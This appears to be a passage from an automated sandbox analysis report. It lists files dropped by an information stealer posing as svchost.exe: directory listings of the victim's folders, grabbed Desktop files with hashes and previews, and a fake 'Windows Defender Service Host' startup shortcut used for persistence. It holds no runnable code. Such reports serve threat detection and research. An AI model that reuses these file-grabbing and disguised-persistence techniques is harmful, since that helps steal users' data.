                                                  SHA-512:804589825EC34F9C8B028295EC33BE926F41F0F31B9E2D9DBED3B452515170B78318C1F90BE97C28E9FFCE5DD31DBC6CE60BE2192AA64870FC220017A6C78CED
                                                  Malicious:false
                                                  Preview:Documents\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Downloads.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):338
                                                  Entropy (8bit):5.296247378390472
                                                  Encrypted:false
                                                  SSDEEP:6:3tcfL6LK0rcNCNWtrB/rvwuuth7kyRh7Wdtslddjgljif/upCWM08NV3:aj6LK0rcNuCt/rvwu6puGdejif/upCWu
                                                  MD5:278EAC32E0DD3806E5F3F391B184947F
                                                  SHA1:618EE22D5D93F252BCEF6EF802F1E97A36B0C445
                                                  SHA-256:788B0C56CAD0EDC8D5AA74B8A4AA971320E9DF9F5DD8602977AA2656096AE179
                                                  SHA-512:4F0386BB38707BF5442D0F5E1DB4B5ACE6A4AD49036FFEAFACF241ABDF2F2EEB15FF350DEC59AFB6BBF078D5288B6D161F46A05AB45956A0E19E05B5AD2A4F84
                                                  Malicious:false
                                                  Preview:Downloads\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\OneDrive.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                  Malicious:false
                                                  Preview:OneDrive\...desktop.ini..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Pictures.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):88
                                                  Entropy (8bit):4.450045114302317
                                                  Encrypted:false
                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                  Malicious:false
                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Startup.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.5269908036173305
                                                  Encrypted:false
                                                  SSDEEP:3:jgBLKSyA7V2AXAHKMJDv:j4LKSyA7VEKMJz
                                                  MD5:962BA2F38107171F546032264F2B3A87
                                                  SHA1:E6836B31DF2F3DE53E5534714D5142ED784ED4B4
                                                  SHA-256:87ECB05FFD7E3140524EAC373C7DD948030312DCFE2AA2B1B6ED9ED82A644EFA
                                                  SHA-512:01CE72E1DC2E9FA0F9A79C873885738114B842E92789AE7A4C9474894CAF7F5A86B1AC5F4B5D02D3F240B9D4921E2A89E85D14CB8A39D0FAE4F771F03573AE71
                                                  Malicious:false
                                                  Preview:Startup\...desktop.ini...Windows Defender Service Host.lnk..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Temp.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4403
                                                  Entropy (8bit):5.190546922929315
                                                  Encrypted:false
                                                  SSDEEP:96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA03MjssMaLTjg/uZ9FGVpd0q:LYfa2fSASOpgu9nI0kjMC1GA08As5vLs
                                                  MD5:57F2274700E72465206D8890E8E1E8CF
                                                  SHA1:CE7893A55E77079654F4746DBEBED5C089DEB55D
                                                  SHA-256:6E03DB17AA0B035022980F9EDE70F34AC3C7D653C275571B2B2F42C174AA8153
                                                  SHA-512:C2EC4CD2B55F2915CE1764CE8A34A831A6173ED89F82CFC1ECFCA41BF2C092212DD8E2818B3DDC1BBD099D31CBF467FF179D4EDC71EB904CC053E65735EA5BDB
                                                  Malicious:false
                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Videos.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):23
                                                  Entropy (8bit):3.7950885863977324
                                                  Encrypted:false
                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                  Malicious:false
                                                  Preview:Videos\...desktop.ini..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:true
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
